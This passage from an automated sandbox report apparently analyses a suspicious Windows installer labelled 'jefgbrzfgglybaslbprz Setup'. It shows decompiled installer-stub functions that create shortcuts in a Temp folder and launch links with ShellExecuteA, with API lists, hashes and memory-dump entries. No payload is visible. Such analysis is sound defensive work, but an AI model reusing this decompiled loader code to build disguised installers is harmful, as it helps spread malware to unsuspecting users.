				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E004029E8(0xfffffff0);
				_t96 = E004029E8(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E004029E8(2);
				 *((intOrPtr*)(_t100 - 8)) = E004029E8(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E004029E8(0x45);
				if(E004055E5(_t96) == 0) {
					E004029E8(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407384, _t75, 1, 0x407374, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407394, _t100 - 0x34);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\hardz\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409360, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 0x34));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409360, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 0x34));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                      0x0040201b
                      0x00402025
                      0x0040202e
                      0x00402038
                      0x00402041
                      0x0040204b
                      0x0040204f
                      0x0040204f
                      0x00402054
                      0x00402065
                      0x0040206d
                      0x0040214d
                      0x0040214d
                      0x00402154
                      0x00402073
                      0x00402073
                      0x00402084
                      0x00402088
                      0x0040208e
                      0x00402098
                      0x0040209a
                      0x004020a5
                      0x004020a8
                      0x004020b5
                      0x004020b7
                      0x004020b9
                      0x004020c0
                      0x004020c3
                      0x004020c3
                      0x004020c6
                      0x004020d0
                      0x004020d8
                      0x004020dd
                      0x004020e9
                      0x004020e9
                      0x004020ec
                      0x004020f5
                      0x004020f8
                      0x00402101
                      0x00402106
                      0x00402118
                      0x00402127
                      0x00402129
                      0x00402135
                      0x00402135
                      0x00402127
                      0x00402137
                      0x0040213d
                      0x0040213d
                      0x00402140
                      0x00402146
                      0x0040214b
                      0x00402160
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040214b
                      0x00402156
                      0x00402880
                      0x0040288c

                      APIs
                      • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402065
                      • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409360,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040211F
                      Strings
                      • C:\Users\user\AppData\Local\Temp, xrefs: 0040209D
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: ByteCharCreateInstanceMultiWide
                      • String ID: C:\Users\user\AppData\Local\Temp
                      • API String ID: 123533781-501415292
                      • Opcode ID: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
                      • Instruction ID: 9a85de16ea5d7a81ede148d9b78cdb1ba9a910f30d2aff7a9c0f788a9809de35
                      • Opcode Fuzzy Hash: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
                      • Instruction Fuzzy Hash: 0E414DB5A00104AFDB00DFA4CD89E9E7BBABF49314B20416AF905EB2D1DA79DD41CB64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00402630, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                      Download Yara Rule
                      C-Code - Quality: 39%
                      			E00402630(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E004029E8(2), _t19 - 0x1a4) != 0xffffffff) {
					E004059E3(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E00405A85();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                      0x00402648
                      0x0040265c
                      0x00402667
                      0x00402668
                      0x004027a3
                      0x0040264a
                      0x0040264a
                      0x0040264c
                      0x0040264e
                      0x0040264e
                      0x00402880
                      0x0040288c

                      APIs
                      • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040263F
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: FileFindFirst
                      • String ID:
                      • API String ID: 1974802433-0
                      • Opcode ID: e252be4d8dac41554fd361ab132364df58656f291f34e3e62bfafec942fe1f51
                      • Instruction ID: 76eef0906e3fa6c86cf2ebea0eb1ad5f879b60bc34498b8afccad509cb3c3919
                      • Opcode Fuzzy Hash: e252be4d8dac41554fd361ab132364df58656f291f34e3e62bfafec942fe1f51
                      • Instruction Fuzzy Hash: 67F0A772A04100EED700EBB59D49EFE7778DF11324F6005BBE111B20C1C7B889419A2A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0019E90A, Relevance: .2, Instructions: 196COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.295074604.000000000019E000.00000040.00000001.sdmp, Offset: 0019E000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_19e000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 195a289bea6c427d6dd0e94af631ce1939ca6bc38f5db606016c202de45f5cbb
                      • Instruction ID: c29ffef93d264119924ed376e9239f4977668d084043e3492193aa2461f0e2c5
                      • Opcode Fuzzy Hash: 195a289bea6c427d6dd0e94af631ce1939ca6bc38f5db606016c202de45f5cbb
                      • Instruction Fuzzy Hash: 6A617F71E00618ABDF10DBA8C884BAEB7F5BF58710F248459F946EB3A0EB749D01CB54
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0019EB1E, Relevance: .1, Instructions: 61COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.295074604.000000000019E000.00000040.00000001.sdmp, Offset: 0019E000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_19e000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                      • Instruction ID: 3e5ec4a4d227735368cbb92dcb10db56ad1f1d9b0186cc5a6a81b29c5dc6a92b
                      • Opcode Fuzzy Hash: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                      • Instruction Fuzzy Hash: 1E11C231A001089FCF20DBA9D8888ADF7FDEF44795B5440A9E806D3310E7309E40D660
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0019EC0E, Relevance: .0, Instructions: 26COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.295074604.000000000019E000.00000040.00000001.sdmp, Offset: 0019E000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_19e000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                      • Instruction ID: c1cc6c3ad1cd26a0bb2baa33ae46032b3a3355fc484454e508632d7560f131bf
                      • Opcode Fuzzy Hash: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                      • Instruction Fuzzy Hash: DDE01A767646499FCB58CBA8C881D65B3F8EB19720B154294FC15C73A1FB34EE00DA50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0019EC4C, Relevance: .0, Instructions: 23COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.295074604.000000000019E000.00000040.00000001.sdmp, Offset: 0019E000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_19e000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                      • Instruction ID: 10959c3e82d7f11b327d02d9c0b1a78507dbfcdf56162f3d7e3adce6c1038873
                      • Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                      • Instruction Fuzzy Hash: 19E08C323116508BCB20DB19C480D62F3E8FB883B171A486AE88AD3721C730FC00C650
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0019EBCF, Relevance: .0, Instructions: 7COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.295074604.000000000019E000.00000040.00000001.sdmp, Offset: 0019E000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_19e000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                      • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                      • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                      • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00403964, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                      Download Yara Rule
                      C-Code - Quality: 84%
                      			E00403964(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				intOrPtr _t44;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x42047c = _t35;
					if(_t115 == 0x110) {
						 *0x423ea8 = _t125;
						 *0x420490 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f458 = _t91;
						E00403E37(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423688);
						 *0x42366c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42047c = 1;
					}
					_t122 =  *0x4091bc; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423ec0;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403E83(0x40b);
						while(1) {
							_t37 =  *0x42047c;
							 *0x4091bc =  *0x4091bc + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091bc; // 0xffffffff
							__eflags = _t39 -  *0x423ec4; // 0x2
							if(__eflags == 0) {
								E0040140B(1);
							}
							__eflags =  *0x42366c - _t133; // 0x0
							if(__eflags != 0) {
								break;
							}
							_t44 =  *0x423ec4; // 0x2
							__eflags =  *0x4091bc - _t44; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405AA7(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403E37(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403E37(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403E37(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x423f2c - _t133; // 0x0
							_v32 = _t49;
							if(__eflags != 0) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403E59(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f458, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x423f2c - _t133; // 0x0
							if(__eflags == 0) {
								_push( *0x420490);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f458);
							}
							E00403E6C();
							E00405A85(0x420498, "jefgbrzfgglybaslbprz Setup");
							E00405AA7(0x420498, _t125, _t130,  &(0x420498[lstrlenA(0x420498)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x420498);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423678);
									 *0x41fc68 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423ea0,  *_t130 +  *0x423680 & 0x0000ffff, _t125,  *(0x4091c0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423678 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403E37(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423678, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42366c - _t133; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x423678, 8);
									E00403E83(0x405);
									goto L58;
								}
								__eflags =  *0x423f2c - _t133; // 0x0
								if(__eflags != 0) {
									goto L61;
								}
								__eflags =  *0x423f20 - _t133; // 0x0
								if(__eflags != 0) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423678);
						 *0x423ea8 = _t133;
						EndDialog(_t125,  *0x41f860);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423678, 0x40f, 0, 1);
						__eflags =  *0x42366c - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420470, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420470,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403E9E(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423678, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x423f2c - _t133; // 0x0
										if(__eflags == 0) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f860 = 1;
											L21:
											_push(0x78);
											L22:
											E00403E10();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f860 = _t127;
										goto L21;
									}
									__eflags =  *0x4091bc - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423678);
						 *0x423678 = _a12;
						L58:
						if( *0x421498 == _t133) {
							_t142 =  *0x423678 - _t133; // 0x0
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa);
								 *0x421498 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}
































                      0x0040396d
                      0x00403976
                      0x00403ab7
                      0x00403abb
                      0x00403abf
                      0x00403ac1
                      0x00403ac6
                      0x00403ad1
                      0x00403adc
                      0x00403ae1
                      0x00403ae3
                      0x00403ae5
                      0x00403ae8
                      0x00403aed
                      0x00403afb
                      0x00403b08
                      0x00403b0f
                      0x00403b0f
                      0x00403b10
                      0x00403b10
                      0x00403b15
                      0x00403b1b
                      0x00403b22
                      0x00403b28
                      0x00403b2a
                      0x00403b6a
                      0x00403b6f
                      0x00403b74
                      0x00403b74
                      0x00403b79
                      0x00403b82
                      0x00403b84
                      0x00403b89
                      0x00403b8f
                      0x00403b93
                      0x00403b93
                      0x00403b98
                      0x00403b9e
                      0x00000000
                      0x00000000
                      0x00403ba4
                      0x00403ba9
                      0x00403baf
                      0x00000000
                      0x00000000
                      0x00403bb8
                      0x00403bc0
                      0x00403bc5
                      0x00403bc8
                      0x00403bce
                      0x00403bd3
                      0x00403bd6
                      0x00403bdc
                      0x00403be1
                      0x00403be4
                      0x00403bea
                      0x00403bf2
                      0x00403bf8
                      0x00403bfe
                      0x00403c02
                      0x00403c09
                      0x00403c09
                      0x00403c09
                      0x00403c13
                      0x00403c25
                      0x00403c31
                      0x00403c36
                      0x00403c40
                      0x00403c46
                      0x00403c48
                      0x00403c4d
                      0x00403c4a
                      0x00403c4a
                      0x00403c4a
                      0x00403c5d
                      0x00403c75
                      0x00403c77
                      0x00403c7d
                      0x00403c92
                      0x00403c7f
                      0x00403c88
                      0x00403c8a
                      0x00403c8a
                      0x00403c98
                      0x00403ca8
                      0x00403cb9
                      0x00403cc0
                      0x00403cc6
                      0x00403cca
                      0x00403ccf
                      0x00403cd1
                      0x00000000
                      0x00403cd7
                      0x00403cd7
                      0x00403cd9
                      0x00000000
                      0x00000000
                      0x00403cdf
                      0x00403ce3
                      0x00403d08
                      0x00403d0e
                      0x00403d14
                      0x00403d16
                      0x00000000
                      0x00000000
                      0x00403d3c
                      0x00403d42
                      0x00403d44
                      0x00403d49
                      0x00000000
                      0x00000000
                      0x00403d4f
                      0x00403d52
                      0x00403d55
                      0x00403d6c
                      0x00403d78
                      0x00403d91
                      0x00403d97
                      0x00403d9b
                      0x00403da0
                      0x00403da6
                      0x00000000
                      0x00000000
                      0x00403db0
                      0x00403dbb
                      0x00000000
                      0x00403dbb
                      0x00403ce5
                      0x00403ceb
                      0x00000000
                      0x00000000
                      0x00403cf1
                      0x00403cf7
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00403cfd
                      0x00403cd1
                      0x00403dc8
                      0x00403dd4
                      0x00403ddb
                      0x00000000
                      0x00403b2c
                      0x00403b2c
                      0x00403b2f
                      0x00403b62
                      0x00403b62
                      0x00403b64
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00403b64
                      0x00403b31
                      0x00403b35
                      0x00403b3a
                      0x00403b3c
                      0x00000000
                      0x00000000
                      0x00403b4c
                      0x00403b54
                      0x00000000
                      0x00403b5a
                      0x00403988
                      0x00403988
                      0x0040398c
                      0x00403991
                      0x004039a0
                      0x004039a0
                      0x004039a9
                      0x004039b2
                      0x004039bd
                      0x004039bd
                      0x004039c9
                      0x004039e5
                      0x004039e8
                      0x004039fb
                      0x00403a01
                      0x00403aa4
                      0x00000000
                      0x00403aad
                      0x00403a07
                      0x00403a14
                      0x00403a16
                      0x00403a18
                      0x00403a37
                      0x00403a37
                      0x00403a3a
                      0x00403a3f
                      0x00403a42
                      0x00403a52
                      0x00403a53
                      0x00403a55
                      0x00403a8b
                      0x00403a9e
                      0x00000000
                      0x00403a9e
                      0x00403a57
                      0x00403a5d
                      0x00403a76
                      0x00403a7b
                      0x00403a7d
                      0x00000000
                      0x00000000
                      0x00403a7f
                      0x00403a6b
                      0x00403a6b
                      0x00403a6d
                      0x00403a6d
                      0x00000000
                      0x00403a6d
                      0x00403a60
                      0x00403a65
                      0x00000000
                      0x00403a65
                      0x00403a44
                      0x00403a4a
                      0x00000000
                      0x00000000
                      0x00403a4c
                      0x00000000
                      0x00403a4c
                      0x00403a3c
                      0x00000000
                      0x00403a3c
                      0x00403a22
                      0x00403a29
                      0x00403a2f
                      0x00403a31
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00403a31
                      0x004039ed
                      0x00000000
                      0x004039cb
                      0x004039d1
                      0x004039db
                      0x00403de1
                      0x00403de7
                      0x00403de9
                      0x00403def
                      0x00403df4
                      0x00403dfa
                      0x00403dfa
                      0x00403def
                      0x00403e04
                      0x00000000
                      0x00403e04
                      0x004039c9

                      APIs
                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039A0
                      • ShowWindow.USER32(?), ref: 004039BD
                      • DestroyWindow.USER32 ref: 004039D1
                      • SetWindowLongA.USER32(?,00000000,00000000), ref: 004039ED
                      • GetDlgItem.USER32 ref: 00403A0E
                      • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A22
                      • IsWindowEnabled.USER32(00000000), ref: 00403A29
                      • GetDlgItem.USER32 ref: 00403AD7
                      • GetDlgItem.USER32 ref: 00403AE1
                      • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403AFB
                      • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B4C
                      • GetDlgItem.USER32 ref: 00403BF2
                      • ShowWindow.USER32(00000000,?), ref: 00403C13
                      • EnableWindow.USER32(?,?), ref: 00403C25
                      • EnableWindow.USER32(?,?), ref: 00403C40
                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C56
                      • EnableMenuItem.USER32 ref: 00403C5D
                      • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403C75
                      • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403C88
                      • lstrlenA.KERNEL32(00420498,?,00420498,jefgbrzfgglybaslbprz Setup), ref: 00403CB1
                      • SetWindowTextA.USER32(?,00420498), ref: 00403CC0
                      • ShowWindow.USER32(?,0000000A), ref: 00403DF4
                      Strings
                      • jefgbrzfgglybaslbprz Setup, xrefs: 00403CA2
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                      • String ID: jefgbrzfgglybaslbprz Setup
                      • API String ID: 184305955-2357613177
                      • Opcode ID: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
                      • Instruction ID: caafd2a66b76c4ae3962cc82e2ded254e31ce9ec1c8840106f3b43a2641cb278
                      • Opcode Fuzzy Hash: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
                      • Instruction Fuzzy Hash: 95C1AF71A04204BBDB206F21ED85E2B7E7CEB05706F40453EF641B12E1C779AA429F6E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00403F7F, Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 204windowstringCOMMON
                      Download Yara Rule
                      C-Code - Quality: 93%
                      			E00403F7F(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				intOrPtr _t71;
				intOrPtr _t85;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t103;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420478 =  *0x420478 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403E9E(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422e40;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422e40
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
